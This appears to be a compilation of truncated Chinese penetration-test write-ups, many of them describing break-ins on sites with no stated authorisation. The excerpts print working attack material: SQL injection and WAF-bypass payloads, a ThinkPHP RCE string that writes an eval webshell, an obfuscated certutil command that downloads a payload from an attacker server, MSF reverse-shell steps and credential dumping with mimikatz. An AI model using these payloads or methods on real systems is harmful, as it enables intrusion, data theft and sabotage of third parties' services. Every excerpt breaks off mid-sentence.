红队攻击面相关讨论

0x01 前言目标是一大学，在一次挖洞过程中遇到个sql注入，尝试进一步利用扩大危害，漏洞已报送平台进行了修复 0x02 sql注入getshell失败在id处连续加两个单引号都报错，经过探测发现是数字型的注入且过滤了空格，这里可以用/**/代替 于是直接上sqlmap python sqlmap.py -u url --batch --tamper=space2comment.py –dbs 发现是dba权限： python sqlmap.py -u url --batch --tamper=space2comment.py --is-dba 试了很多方法找web路径 最后注意到操作系统是FreeBSD 无意中看到这个 char(47)就是’/’，立马想到可以通过这个遍历目录、找路径 通过从根目录开始逐层遍历，最终找到网站根目录： 写入shell失败，转换成16进制规避单引号还是不行 但是这个注入可以读取服务器上的任意敏感文件（包括非web目录），危害巨大 0x03 从其它点继续尝试读取sql注入处代码，发现并没有代码层面的过滤，explode() 函数把字符串打散为数组，这里以空格为分隔，取数组的第一个，变相地过滤了空格，把空格换成内联注释就能注入 根据泄露的数据库账号、密码尝试连接3306端口失败，估计绑定了本地ip 继续遍历目录，发现了mysql的登陆界面 登录之后却是空白界面，读取处理登录逻辑的代码发现登陆成功直接设置session但不跳转，登陆后直接访问首页就行 查一下secure_file_priv，发现是…

前言本文为一篇利用非常规手段突破安全策略的内网渗透记录 环境简述&说明web打点getshell，webshell是冰蝎，权限为.net，权限很低，服务器为server 2016，目标不出网！装有杀毒软件（火绒、微软自带的WD），ASMI默认开启，而且对power shell有特殊策略限制。Tcp、icmp、DNS协议不通，无法直接与公网的cs服务端建立连接，（内网的cs服务端也无法与其建立连接）公网也无法访问目标web服务（纯内网web服务）极其严格的出入站策略入站规则：只有http允许入站，只有一个80、8080两http端口能供内网机器正常访问 出站规则：不允许非8080端口对外通讯。 手绘了一张拓扑图，将就着看一下。 为什么要上线cs webshell权限太低，限制性大，需要上线cs提权，因为cs是采用反射dll来加载pe程序，从而在执行一些敏感操作的时候能起到一定的bypass作用，例如mimikatz抓密码等操作。 像转储LSA到本地然后再dumphash都是行不通的，因为webshell权限太低了，转储LSA至少得管理员权限。 而且目标网络环境较为苛刻，任何非http协议的通讯都会被防火墙拦截，无法正常建立一个具有交互功能的shell。 坑点一：利用Pystinger反向代理上线cs在查阅相关资料后，发现网上大部分文章都通过Pystinger来实现内网反向代理，利用http协议将目标机器端口映射至cs服务端监听端口，能在只能访问web服务且不出网的情况下可以使其上线cs。 但是这里有个问题，公网cs服务器无法访问目…

0x00 初探内网在向信息中心的老师申请了对学校进行一次内网渗透测试的授权之后，我开始着手对学校内网中在用系统进行了一波信息搜集。其中大部分都使用了新版的未爆出0day的框架组件，这让我一开始的打点过程陷入僵局。但是在我重新翻了一遍学校开放的各种web系统后，我发现了一些令人惊喜的系统。 学校使用了很多新系统，但是并没有把老系统关闭，经过一番搜索确定了这个老系统存在任意文件上传漏洞。 没有任何过滤，可以说就是捡漏了。 而且也返回了一句话木马的路径。但是我遇到了一个很奇怪的现象，用蚁剑和用菜刀连接后，返回的路径不一样，其中的文件也不一样。 其中蚁剑连接的shell无法上传文件，而菜刀连接的却可以，并且webshell执行一次命令后就会封禁IP，怀疑有waf。所以我先传了一个msf的aspx木马来获取一个meterpreter的会话。使用windows-exploit-suggest探测未打的补丁。 发现存在MS16-075这个非常好用的漏洞，直接配合msf的juicy_potato模块来攻击，记住要修改CLSID，可以在这里找 https://github.com/ohpe/juicy-potato/tree/master/CLSID 使用的payload最好要选择正向连接 bind_tcp，不然有可能弹不回来shell。 这样就获取了system权限。接下来就是对机器进行信息搜集，获取对我们横向渗透有帮助的信息。很奇怪的一点是，这台机器本来是有域的，但现在却没有了，且无法找到域控。所以我们的重点放在密码撞库。使用msf自带的m…

本次测试为授权测试。注入点在后台登陆的用户名处 存在验证码，可通过删除Cookie和验证码字段绕过验证 添加一个单引号，报错 and '1'='1 连接重置——被WAF拦截 改变大小写并将空格替换为MSSQL空白符[0x00-0x20] %1eaNd%1e'1'='1 查询数据库版本，MSSQL 2012 x64 %1eoR%1e1=@@version%1e-- 查询当前用户 %1eoR%1e1=user%1e-- 查询当前用户是否为dba和db_owner ;if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItFOR%1edeLAY%1e'0:0:5'%1e -- ;if(0=(SelEct%1eis_srvrolemember('db_owner'))) WaItFOR%1edeLAY%1e'0:0:5'%1e -- 均出现延时，当前用户既不是dba也不是db_owner 尝试执行xp_cmdsehll，没有相关权限 ;eXeC%1esp_configure%1e'show advanced options',1;RECONFIGURE%1e -- ;eXeC%1esp_configure%1e'xp_cmdshell',1;RECONFIGURE%1e -- 查询当前数据库，连接重置——被WAF拦截 %1eoR%1e1=(db_name()%1e)%1e-- 去掉函数名的一个字符则正常返回——WAF过滤了函数db_name()。MSSQL和MSQL有一些相同的特…

0x01 前言随机找的个台湾某越科技集团下的站点作为此次测试目标，只是为了学习下内网渗透和MSF的使用。13年9月份时拿到了一个子域的Webshell权限后就没再继续测试了，当时服务器没有安装Symantec赛门铁克，但第二次去测试时发现已安装了Symantec，并进行了一些安全加固。 0x02 网站和内网的基本信息搜集 基本信息探测： 目标站点：http://www.ttes*****.com服务器IP：59.***.**.74（台湾省 中华电信）环境平台：ASP.NET服务器系统：Microsoft-IIS/6.0（Wind 2003）网站子域搜集： ，表中的这些子域名是前期搜集到的信息，但没想到很顺利的就拿到了Webshell（Fckeditor），如果主站找不到什么漏洞时可以通过“旁站”或“子域”下手。 因为本文着重记录的是MSF工具的使用和难点解决，所以对于怎么拿到的Webshell就不做过多描述了，在拿到权限后搜集到的服务器信息如下。 端口开放：25、80、135、445、1025、1521、3389补丁情况：服务器系统打了460+补丁(64位)脚本探测：服务器支持Asp、Aspx拓展名磁盘权限：C、D盘都有可读可写权限（大多数）ipconfig /all命令可以看到这台主机名为：websrv4，IP：192.168.0.203，DNS：192.168.3.1 Windows IP Configuration Host Name . . . . . . . . . . . . : websrv4 Connection-…

前言前不久的一次授权测试中，感觉缺少任何一步都无法达到getshell的目的,单个漏洞看得话确实平平无奇，但是如果组合起来的话也许会有意想不到的化学效应。 前期测试拿到这个站的时候一眼就看见了会员登录界面,一开始想着注册，但是觉得会员功能应该很少，没验证码啥的，万一后台管理员也是会员呢那岂不是要是爆破出来了可以去后台尝试一波。 显示的是手机号登录，但是可以尝试下admin,千万不要被他的前台迷惑了。很巧的是可以进行用户名枚举，而且还存在admin账号,不爆破都对不起他 字典呢用的是鸭王的字典,爆破神器，用这个字典爆破出来过不少站点(https://github.com/TheKingOfDuck/fuzzDicts), 这次也很幸运，爆破出来了 拿到后台去登录下,管理员确实喜欢采用同样的密码，登录进去了。看到后台可以自定义上传的后缀心里想可以愉快的交差了，增加后缀php,找上传一条龙getshell。 当我看到上传图片的编辑器的时候我感觉事情并不是那么简单,果不其然那个增加后缀不起作用 后台发现是thinkcmf建站系统，网上搜索能利用的漏洞,看到一个漏洞集合(https://www.hacking8.com/bug-web/ThinkCMS/ThinkCMF%E6%BC%8F%E6%B4%9E%E5%85%A8%E9%9B%86%E5%92%8C.html) 挨个去尝试下无果，继续搜索(https://www.freebuf.com/vuls/217586.html), 基本上能尝试的都payload都试了试,应该是版本高漏…

0x00 前言上面给了个任务，一看，地图系统，懵逼了，这种的系统一般就是调个百度地图的api，无交互，想要挖洞简直难上加难... 一波信息收集后，发现该主站一个功能可以跳转到该单位的微信公众号，且存在上传点，因此有了本文。 0x01 FUZZ有了上传点，废话不多说先看看后缀能不能过 先传一个图片，更改后缀尝试上传 直接没了，难道是白名单吗，尝试随意后缀上传 发现可以上传，可能是存在waf？ 直接传内容为一句话，看看会不会被拦截 结果没被拦截，应该是代码对后缀做了一些操作， 接下来就是一顿fuzz，搞了半天发现后缀名这边是过不去了，换行大法直接报错 拿出之前过安全狗的方法试了一下，溢出Content-Disposition:字段， 竟然就这么成功了... 0x02 又一个问题现在传是传上去了，但是没有返回完整路径，也不知道传哪儿去了，这咋整 扫当前目录啥也没扫到 然后扫了波一级目录，发现存在upload目录， 尝试拼接，成功getshell 0x03 总结1.通过目标站点的公众号处存在一处附件上传，那么可能存在任意文件上传漏洞2.通过bp的intruder功能对后缀名进行批量fuzz，发现都被拦截，这里又测试上传test.aaa，内容为this is a test,发现可以上传，那么猜测目标站点存在WAF,拦截了后缀名3.接着测试上传的内容为一句话木马，可成功上传，并没有对内容进行拦截3.通过Content-Disposition:拦截字段填充可绕过waf成功上传，并返回上传的文件名，但是并不知道上传的路径如:Co…

0X01 找到注入点故事的起因还是因为我太闲了，上班摸鱼。 摸着摸着就摸到了某个网站的查询框。 接着老毛病就犯了，上去就输入了个1查询 接着输入了1’ 啧啧啧，这明显有SQL注入哇。 果断掏出SQLMAP神器。 结局很完美，不仅存在注入，还是DBA的权限。 0X02 网站get shell利用SQL注入去get shell有几种常见的方法，一种是跑数据，跑目录找到网站的管理后台，进入到后台想办法通过文件上传的等方法去拿shell；要么就通过报错，phpinfo界面，404界面等一些方式知道网站绝对路径，然后去写入shell，不过相对于mysql来说条件还是有些苛刻的。 接着就是掏出御剑开始扫网站目录，目录还挺多。 随意点开了个admin 我去，竟然存在目录遍历。 接着又点开了00/ 一口老血喷出，这，还没开始就结束了？？？ 绝对路径不请自来，竟然还是最常见的路径，早知道直接--os-shell跑常见路径了-- 含泪拿着绝对路径，直接SQLMAP中--os-shell 这里有个点要了解一下，sqlmap中mysql数据库--os-shell的时候，sqlmap先写入一个文件上传shell tmpxxxx.php，再通过文件上传shell上传命令执行shell tmpxxxx.php，再利用命令执行shell执行命令。 具体可以去雨九九大佬博客学习一波。 https://www.cnblogs.com/Rain99-/p/13755496.html 所以这里我就直接用sqlmap文件上传的shell去上传我的shell了 …

0x01 前言当一个企业把他的业务放到腾讯云或阿里云等公有云的时候，其是与企业的内网是不相通的，相当于逻辑隔离了(非物理隔离)，如果企业信息安全做的相对较好，不暴露VPN地址或者路由器或防火墙业务，信息收集的时候，是很难进精准定位到企业的内网使用的公网地址的。这个时候，想要渗透内网相对困难。 下面就介绍一下我从公有云到渗透进内网进行漫游的实际渗透过程。 0x02 前期打点怎样拿下云服务器的不是本文重点，故不做详细介绍，只简单介绍思路。 根据公司名字，直接百度，发现官网地址。根据官网地址，进行了一波信息收集： 发现站点使用了CDN，是腾讯云主机，ip是变化的，无法探测真实IP；发现存在任意命令执行漏洞。直接RCE，拿下服务器权限；先看下ip地址 发现显示的是内网地址，这个时候，查看下真实的ip，虽然这个对接下来的内网渗透没什么diao用。 到此才发现是腾讯云，主机不在内网。 0x03 想办法打内网这个时候，我就要办法获取公司办公网的外网IP了，这个外网ip要么是防火墙的，要么是路由器的。怎么获取呢？我想到了一个办法，一般云主机，运维人员会通过ssh来进行管理，一般在上班时间，他们会连接进来，这个时候，就会获取到公司的真实公网IP。 教大家一个小技巧，如果是小公司，运维可能十天半个月都不会连上来，这个时候，我们就可以搞点“小破坏”，逼迫运维上线。 比如关闭它的web服务等等，大家千万注意两点： 动作不要太大，免得被运维发现被黑，当然你可以提前做权限维持，这里不做介绍；没有“授权”，千万不要乱搞；没有授权，千万不要乱搞；没有授权，千万不要乱搞，…

前言最近对云安全这块比较感兴趣，学了一波k8s的架构和操作，正好遇上了华为云的这一场比赛，收获颇多。 (甚至通过非预期拿下了平台题目集群的最高权限)。 0x00 题目入口发现拿到题目发现是一个类似于提供IaaS服务的站点，扫描了一波目录，发现几个文件以及路由: phpinfo.php robots.txt admin/ login/ static/挺奇怪的是，在一个存在phpinfo的环境下发现了一个beego框架后端的403界面： 初步猜测是.php的文件交给了nginx fastcgi进行处理，而其他路由则是交给了beego进行处理。 接着我们先看/admin路由，发现存在一个隐藏的表单 因此自然的想到使用burpsuite进行弱口令的爆破，发现存在弱口令 admin:admin 登录成功后返回了两个url， 下载 tools.zip，同时根据名字猜测/wsproxy是一个websocket的代理路由，而查看tools的源码发现是一个wsproxy的客户端程序。 至此，我们找到了进入内网的通道。 0x01 wsproxy 进入内网直接对拿到的tools源码进行编译，获得客户端连接程序 根据使用说明，我们可以通过简单的命令连接上题目的wsproxy,同时密码为tools源码目录下的 pass.txt(UAF)，session就是我们登陆admin后，题目给的beego session 这样会在本地的1080端口开启一个 socks5 代理，通过这个代理，我们就能够连入内网。 0x02 phpinfo泄露k8s集群信息由于这道题目的名称 …

首先在奇安信hunter上搜索找到该SRC的有关资产（具体我就不放了），然后通过微步来搜索子域名找到今天的测试站点。 然后利用xray中检测到该站点存在Shiro反序列化漏洞 于是考虑直接用feihong的反序列话工具，但是这次feihong的反序列化工具只检测出key，gatget没有检测出来，咨询了同事琛哥后，故考虑到是因为工具很久没更新，需要找一条CB的链，啪的一下回车 直接开冲，先看下系统中是否存在杀毒软件，一目了然，系统中存在火绒杀毒软件。 在确定了目标系统存在火绒后我第一时间尝试了hta上线，相关文章内容：记一次绕过火绒安全提权实战案例 不过很可惜这个方法我在本地多次尝试后发现火绒已经对这个方法进行了拦截和查杀。 后续和3h师傅交流应该是对文件的特征进行了查杀，不过也没有在深一步探索绕过的方法。 题外话：这里测试的时候有一个小坑，感觉是工具的问题，工具在执行需要大量回显的数据包时会卡死，需要重新启动工具再执行一次命令才行。 这里绕过火绒选择了certutil远程下载方式，常规的cerutil直接下载肯定是不行的，于是想到了以前群里有师傅发过的变形版的certutil绕过方式。在本地测试后发现火绒没有拦截该命令，此时激动的小手已经焦躁不安。 "c""e""r""t""u""t""i""l" -"u""r""l""c""a""c""h""e" -split -f https://url/1.exe 1.exe题外话：发现目标系统不解析我vps的IP，搞得我晚上凌晨还在四处找人要VPS，感觉还是得随时准备一台国内的vp…

0x01 前言某日闲来无事，上fofa搜了xx系统，想着碰碰运气，类似这样 0x02 测试过程随便挑了一个站点打开 Em…，试试运气，反手admin admin就进去了，是一个管理系统 然后根据网站的功能点，随便点击几个，发现除了常规的操作也没啥了，翻了一会，发现有一个文件下载操作 好家伙，藏得挺深，抓包看看，请求的地址好像是一个文件 fileName改成../etc/passwd看看，好家伙，报错了 看来应该不是这个路径，随后依次尝试了../../etc/passwd和../../../etc/passwd都是500错误，到了../../../../etc/passwd的时候就能访问到了 再看看能不能读历史命令，如果可以读历史命令，可以看看有没有网站备份文件或者网站安装包，嘿嘿，改路径为/root/.bash_history，访问！….500错误 看来应该是权限不够。没办法了，从其他地方入手吧。 接下来可以F12看看网站源代码，用源代码中标志性的语句或者文件去fofa搜索相同的系统，说不定会有root权限，大概像这样 有了相同的系统之后，再次尝试弱口令 可能是最近运气不错吧，弱口令又进去了。嘿嘿 接下来尝试刚刚的操作，下载../../../../etc/passwd文件看看 再试试读历史命令/root/.bash.history 可以读到历史命令，慢慢翻，最终发现有网站源码 反手下载下来 解压一下 JSP的站，没学过java的我裂开了，先跟着历史命令把环境搭起来，于是在自己服务器上部署了一样的系统。 没学过java，自动…

0x01 站点1：文件上传 发现源代码泄露打开自己珍藏已久的辣鸡字典，扫描发现存在bin.zip信息泄露，尝试进行代码审计 文件位置：SimpleDataPlatform.SimpleDataPlatform.fileUpload 找到ProccessRequest接收请求，可以看到获取了一堆参数后（初始化），后进入了HandleFiles方法， 跟进HandleFiles进行处理，如果dateType=ZBJHSB时，就继续处理请求，dateType为GET传参 路径为/Uploads/SetData/ZBJHSB，str名称为时间戳，且str2(后缀)没有进行限制就进行保存， OK，这应该是一个妥妥的任意文件上传了，只要有返回值，那么这个站就没了。但是很不凑巧的是，他没有返回值。 由于方法fileUpload，瞎猜文件名为 fileUpload.aspx fileUpload.ashx fileUpload.asmx fileUploads.aspx fileUploads.asmx fileUploads.ashx Upload.....等加上自己现有的字典爆破了一波,成功找到了返回了200的文件名http://xxx.com:6039/FileUploads.ashx 直接构造上传表单，这里Form里的name字段应该是没有具体设置的（代码里没有找到），发包后返回200，可能真的传上去了吧？ POST /FileUploads.ashx?DataType=ZBJHSB HTTP/1.1 Host: xxx.cn:6039 C…

0x00 信息收集接到一个紧急测试任务，只有一个目标名称（某某医院）和一个ip。 首先，使用goby一把梭对拿到的ip来个全端口扫描： 服务包括Weblogic，jboss，springboot，Struts2，以及其他各式各样的系统（简直就是Nday练习靶场） 0x01 外网渗透其中尝试了利用jexboss打jboss反序列化，Weblogic的反序列化（10.3.6.0版本），Weblogic的其他CVE漏洞利用，springboot的未授权，Struts2的反序列化漏洞均失败 但是在8282端口的临床技能中心管理平台发现了弱口令 （admin/admin）可成功登陆到后台： 经过测试，目标的字典管理下的屏幕信息管理系统的设置显示图片处存在任意文件上传 只需要将png后缀的jsp马上传，在利用BurpSuite直接抓包改为jsp后缀即可 上传完毕后，访问目标url，webshell存在，但是利用Godzilla直接连接会失败 经hum大师傅的发现，在链接时需要带上当前页面的cookie（这里目标对url做了强制跳转，如果未登陆，都会条回到Login页面。) 这样的话webshell的url就无法正常访问了）带上cookie即可正常连接（cookie到期后，webshell便会掉）。 连接成功后，为了稳定webshell，我们尝试将webshell写入到根目录和静态文件的目录，但是仍会受到强制跳转的影响。 于是将webshell内容写入到了在登陆前就能访问的jsp正常文件中，来稳定shell。 0x02 内网渗透之后对目标…

一、事情的起因这位兄弟找到我,告诉我被骗了很多钱,我们这些正义的白帽子当然能帮则帮啦.当然,毕竟是杀猪盘,即便是拿下也不能把钱追回二、信息收集拿到目标网站，可见是一个很常规的bc站,而且做的有点low逼。先进行简单的信息收集通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息命令行nslookup+url查看ip,发现没有CDN再到站长工具上看看 http://s.tool.chinaz.com/same香港的,羊毛出在羊身上,中国人在骗中国人?知道ip地址后端口扫描一波（全端口扫描+服务探测。这个过程比较漫长，可以先干别的） 看到开放3306端口,连接一下看看 发现不行,应该是不能外连三、后台攻陷回到web，反手在url后面加一个admin 发现不行,这才想起来一般BC的后台都是单独存在的既然如此,只能找一找xss了先注册账号登录进去看看填写的都是虚假信息,请勿当真进去以后是酱紫,感觉很熟悉,好像之前有过0day奥,好像是在存款的地方试一波提交看看xss平台能否收到cookie收到了cookie,确定xss存在,下一步登录后台此处可以看到,用户其实不少而且被骗的用户都会被管理员删除账号导致现在的用户看着很少四、寻找上传点看到有数据库备份,但是发现不可以下载,放弃之后问了群里的大佬,大佬说可以做一个flash钓鱼,源码我下载以后,发现做flash钓鱼需要具备三个条件我就果断放弃了条件:一个免费空间一个免费域名（域名可以搞一个 www.flashxxx.tk 这种的，可信度比较高） 这个可以正常上线的马…

0x01 收集信息因为主要想练习sql注入，所以信息收集做的比较简单： 通过fofa找到相关cms，这里发现棋牌后台登录处存在SQL注入漏洞 0x02 漏洞利用1.利用sqlmap一把梭，并获取os-shell 2.利用python搭建一个简单的http服务器，并挂载MSF生成的后门文件 python -m SimpleHTTPServer 3.os-shell下远程下载后门执行程序 在os-shell下通过命令创建一个目录 mkdir C:\test 在os-shell下通过certutil命令远程下载后门文件到服务器上 4.执行msf反弹shell use exploit/mulit/hander set lhost 接收反弹shell的ip run 5.成功进入该服务器 这时发现我们只有gust权限 难受 6.对目标服务器进行提权 提权方法：内核提权以及窃取管理tokens提权 本文只利用窃取管理tokens提权 使用use incognito来加载会话令牌模块 然后list_tokens -u来列出会话令牌 7.创建用户 命令：net user 用户名 密码 /add 0x03 渗透总结1.通过SQLmap获取os-shell2.在msf下生产后门文件3.通过python -m SimpleHTTPServer 搭建http服务器，并将生成的后门文件拷贝到到http服务器目录下。2.在os-shell模式下创建目录，并通过certutil远程下载http服务器上的后门。4.通过MSF反…

0x00 使用关键词得到目标源码某日上午接到临时安排对某公司进行渗透测试，此次渗透给的是一个主域名，并且也没有子域，打开了目标网站先对其进行一波信息收集 中间件: IIS 8.5 输入admin发现自动添加了/ 说明其目录存在，那么盲猜一波文件，login.aspx default.aspx main.aspx 等等 最终在login.aspx下面发现后台登录页面。这不猜他一波弱口令？？ 一顿操作过后账号被锁 熟悉的开局，既然如此只能尝试其他方法了。 在主页的html代码中发现了某处信息 设计制作？根据后面的域名访问过去，是一个建站公司 那么，入手点来了。IIS8.5+ASP.NET+建站系统 先扫一波备份文件: 400多条ip这开发商还行。使用FOFA查询工具，批量导出 然后我们来扫一下备份文件。这里推荐我B哥的扫描器 https://github.com/broken5/WebAliveScan 可以进行批量存活扫描和目录扫描 在好几个站下面发现web.zip备份文件。 下载下来过后，对其目标站点文件进行了对比。基本一致 0x01 拿到代码开始审计多次碰壁那么开始审计。 在某接口处放下敏感操作 WebClient.DownloadFile (远程文件下载) 由于该方法需要提供绝对路径。。比较头疼，但我跟踪相关参数。发现。 在另一个方法中调用了该方法。 并传入Server.MapPath，这根本不需要找绝对路径了系统都给你安排好了。 那么构造POC: ashx/api.ashx?m=downloadfile&amp…

0x01 前言由于疫情问题，学校的易班APP新增了打卡系统，每天需要进行晨检，午检打卡，忘记的话就是上千字检讨 本人对于这种“形式主义”深感不满，适逢最近成立了网络安全战队，于是准备操作一番 0x02 踩点基本的信息搜集咱们就不多说了 因此不同系统使用了不同的多台服务器 看样不能一劳永逸，需要各个系统、服务器奇妙的学校系统渗透之旅，拿下核心系统， 然后摸入核心系统中 首先打开“易班”系统的首页是这个样子 不难看出，开发者使用了TP框架，在简单地测试了各种TP 注入， RCE的payload后均以失败告终，看样安全意识还不算太差 域名下的首页完全就是一个报错页面，没有任何功能点和信息 俗话说得好，信息搜集的好坏直接决定了我们渗透的成败，因此我们绝对不能疏忽大意。 我们先来fuzz一级目录 成果还不错，不少目录和功能点， 随后我们继续fuzz各个一级目录的二级目录，不断摸索该域名下部署的功能点 具体的就不上图了，因为一级目录太多了。 了解清楚功能点后，直接脱裤子开干 0x03 心理健康系统的渗透（IIS短文件名-->老登录口-->爆破-->新登录口-->上传）通过一级目录爆破，爆破出 http://xxx.xxx.edu.cn/psy这个路径 发现其中部署了心理教育健康系统，中间件为IIS 但是心理健康系统登录口有验证码机制，而且验证码不容易识别 立马想到iis短文件名特性 随后通过iis短文件名目录扫描工具 （https://github.com/lijiejie/IIS_shortname_Scanne…

0x01 前言找到某色情app的界面 看了看功能点，有一个注册的地方，但是注册的时候居然要邀请码！！！ 0x02 渗透过程于是将app放到虚拟机，通过抓包拿到其真实域名 然后利用bp的爬虫爬到一处api接口 提示参数缺失 fuzz一波参数 http://www.xxxxxxx.cn/api/index/tab3?p=1&t=3&v=0&s=0 通过sqlmap进行注入 但是不是DBA 也无法写文件 数据库实在太乱了 懒得一个一个的读 目前后台地址也还没找到 而且这个站及其的卡 思路完全乱了，， 想着先利用注入搞一个账号出来 然后登录该app,看看app内有无什么可利用的 但是除了一处留言反馈准备测试xss之外，就是各种诱惑。。。。 留言框只允许中文以及中文符号，但是却是使用js进行验证，抓包即可绕过 对着该处留言框就是一顿乱插 中途等了大概10分钟 就当我以为要失败的时候 果然，，菜逼运气好== 拿到后台登录地址 虽然没有cookie 但是利用注入点读出了后台账号密码 最后登陆后台 看了看后台，app总用户达到1w+…一天用户增加500+ 翻了下后台的功能，发现一处图片上传，而且似乎是js验证的图片类型 但是在实际上传中 各种失败，应该是前台js验证+后端功能让所有上传的文件强制改名为.jpg 接下来的事就比较好玩了，虽然拿到了后台，但是没法突破，没卵用 于是我添加了后台留的一个QQ号 对方秒通过，经过简单的交流，发现他是这套程序的二开作者，售卖给别人被别人用来当作…

0x01 确定目标 主站： 旁站： 0x02 漏洞利用通过信息收集发现是个tp v5.0.9，此版本存在tp-rce漏洞。 直接通过payload进行测试， Post：_method=__construct&filter[]=assert&method=get&get[]=phpinfo() 查找payload，直接打： Post：_method=__construct&filter[]=assert&method=get&get[]=phpinfo() 发现是php 5.4.45版本的， 直接尝试getshell： 发现system被禁用，尝试其他系统命令的也一样。 查看phpinfo中desable_functions禁用了那些函数。 想办法怎么绕过进行写马（此处卡了我半天） 最后通过一位渗透小伙伴，想出下面的可以利用file_put_contents直接写shell，想了半天，忘了用其他函数进行直接写马就可以了，并不需要非得利用system命令进行写马，还是底层知识薄弱啊。再次感谢小伙伴！ 0x03 getshell构造payload： _method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>') 写入成功，利用菜刀连接。 成功连接。 查看权限： 发现启动了远程安全模式。 想要绕过…

0x01 前言备考的时候偶然点了进了本校内网的某个站点 , 停下了复习(直接拔剑) 0x02 渗透过程测试到注入 http://url/newdetail.aspx?id=11999' or 1=1 -- 直接Sqlmap一把过 , 连waf都没得(狗头) 随便看看 python sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbs python sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users DBMS sqlserver 2005 whoami 在windows中nt authority system 是内置的系统管理账户 查看下目录chdir Dir c:\ OS版本 Microsoft(R) Windows(R) Server 2003, Enterprise Edition ipconfig 服务器端存在certutil等于是决定测试一下命令 vps python -m SimpleHTTPServer 80 打一下 ping wt070h.dnslog.cn certutil.exe -urlcache -split -f http://funny_ip/amazing1x 发现回显 奈何网站路径是中文的 , sqlmap写木马的话会乱码 , 找了找解决办法无果 看看环境变量 Nmap看看端口 因为尝试远程连接的时候出了一些问题，起初不知道是什么原因所以打…

0x01 弱口令在一次针对某站点信息收集的过程中，通过子域名扫描，扫描到某个老旧系统。 一看这都2014年的老站了，肯定有搞头！ 日常使用burp爆破一波试试，没爆破出来 但是随手一试，好家伙123/123进入系统，属于是运气拉满了 （高强度打码） 这里能看到是一个“编辑”人员的权限，并没有什么上传等后台管理的功能，只能耐心过一遍系统的各种功能。 0x02 SQL注入进入系统翻一翻，没有什么敏感信息泄露，但是在一处查询人员信息的接口发现了SQL注入（xray被动扫描扫出来的） http://host.com/xxx/control/SearchMenHunInfo?content=123 这时想要手工验证一下，发现甚至不需要后台cookie就能直接访问该接口，相当于还存在未授权访问漏洞。 那这sqlmap一把梭，--cookie参数都不用加了 这里跑出了库名，还能看到这是一个Oracle数据库。打算继续拿shell试试。 但是在我日常渗透过程中，Oracle数据库并不常见，sqlmap中--os-shell参数还是不支持Oracle数据库的，只能现学现卖一波。 0x03 getshell首先参考了这篇文章 Oracle注入 - 命令执行&Shell反弹 文章中介绍到以下版本的Oracle在发现注入后可以命令执行 那么再用sqlmap查看一下Oracle版本 看来是符合可以命令执行的版本的！ 又经历了一波漫长的学习，发现了github一个大佬已经集成好的工具 oracleShell oracle 数据库命令执行 工具…

0x00 漫长的探索 某天，接到一个任务，要求对某医院的信息系统做一次安全检测，看能否发现问题。经过初步的信息收集后，发现该医院并无官网，只有一个微信公众号提供了预约挂号，缴费等功能，看来只能把突破点放在这个公众号上了。 下图是微信公众号的一些功能： 当点击这些功能并抓包的时候，令我看到奇怪的是所有的请求都指向了a.test.com这个域名，如下图，原谅我的厚码... test.com这个域名经过查找后发现是一家提供医疗信息系统的本地公司,但不解的是为什么医院的系统会放到供应商公司去呢？他们是如何进行数据同步的呢？带着这些问题我开始了对a.test.com这个域名的测试。 看到这个熟悉的页面，确定了此系统大概是由sping boot开发的，经过一系列常规操作后，只发现了一个swagger-ui页面。 由于我们的目标是拿权限，所以重点对此页面的接口进行了sql注入和越权等测试，无果，也没有任何的文件上传接口,开始卡到这里了。 回过来想，a.test.com这个域名是test.com的子域名，是否能够通过test.com进行突破呢？ 访问test.com,打开的是供应商公司的官网。 对test.com的域名做信息收集后发现了几个子域均解析致某云服务器，但是ip不同。 首先git.test.com这个域名引起了我的注意，打开后是一个gitlab服务。 gitlab历史上是由几个漏洞的： 但不幸的是此系统版本较高，漏洞均以修复。 那会不会由弱口令呢？使用几个常用的用户名和top密码进行爆破，无果，我又想办法加到了此公司的一个qq群…

0x01 目标 country="US" && app="APACHE-Axis"从老洞捡些漏网之鱼，没准还会有意外收获 目标出现 还是熟悉的页面，熟悉的端口 然后尝试默认口令登录，ok, 这下稳了 先搜集一下信息 不要上来就部署包，先看一下现有的服务，像这种弱口令的基本上99.9999%都已经被人搞过了 再上传包就多此一举了，可以直接利用 找了一圈没发现遗留的马儿 找绝对路径自己上传 C:/elocker/webapps/admin/WEB-INF/classes 顺手一测，竟然可以出网，也不需要传shell了，直接掏出cs 执行命令 看结果失败了 0x02 反弹shell难道是因为在url里执行，导致powershell命令没有执行成功吗？ 带着这个疑问 反弹shell尝试一下 结果还是失败，可以确定，应该是有waf 0x03 写入shellx.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp 查看一下进程 通过对比发现某安全卫士 0x04 绕过杀软通过测试发现，最基本的net user也执行不了 摆在面前的路只有2条 做免杀抓密码果断选择抓密码，简单有效。 mimikatz不免杀不可直接用 这里我利用procdump把lsass进程的内存文件导出本地，再在本地利用mimikatz读取密码 上传 procdum…

0x01前言下文的所有漏洞都是需要有学校统一门户的账号和密码的情况下才能挖掘出来的，不过我也有挖到个别特殊的学校个例，可以直接未授权访问那些目录页面造成危害。挖掘的案例均已提交至漏洞平台并已经修复。 0x02 渗透过程首先登陆统一门户，登录账号密码，找到学工系统页面： 1.越权漏洞： 访问以下的路径： http://x.x.x.x/xgxt/xsxx_xsgl.do?method=showStudentsAjax&amp;isAll=true 然后便可查看所有学生列表： http://x.x.x.x/xgxt/general_szdw.do?method=szdwRybb&amp;lx=fdy 然后便可查看所有辅导员列表： http://x.x.x.x/xgxt/xsxx_xsgl.do?method=getXsjbxxMore&amp;xh=某学号 然后便可以查看该学号的学生的敏感信息： 最后根据该漏洞可以编写个脚本，来批量获取系统内用户的敏感信息，效果如下： 2.任意密码重置漏洞： 访问该路径： http://x.x.x.x/xgxt/mmzhgl_mmzh.do?method=xgmm&amp;yhm=想要修改的账号 然后可以将系统内置的超级管理员账号的密码重置，我重置为test0123： 然后再退出到http://x,x,x,x/xgxt/的学工系统登录页面，重新登录： 登录成功： 既然是超级管理员，那么便可查看到许多敏感信息了，这里就不截图和赘述了。 3.文件上传漏洞（需要绕…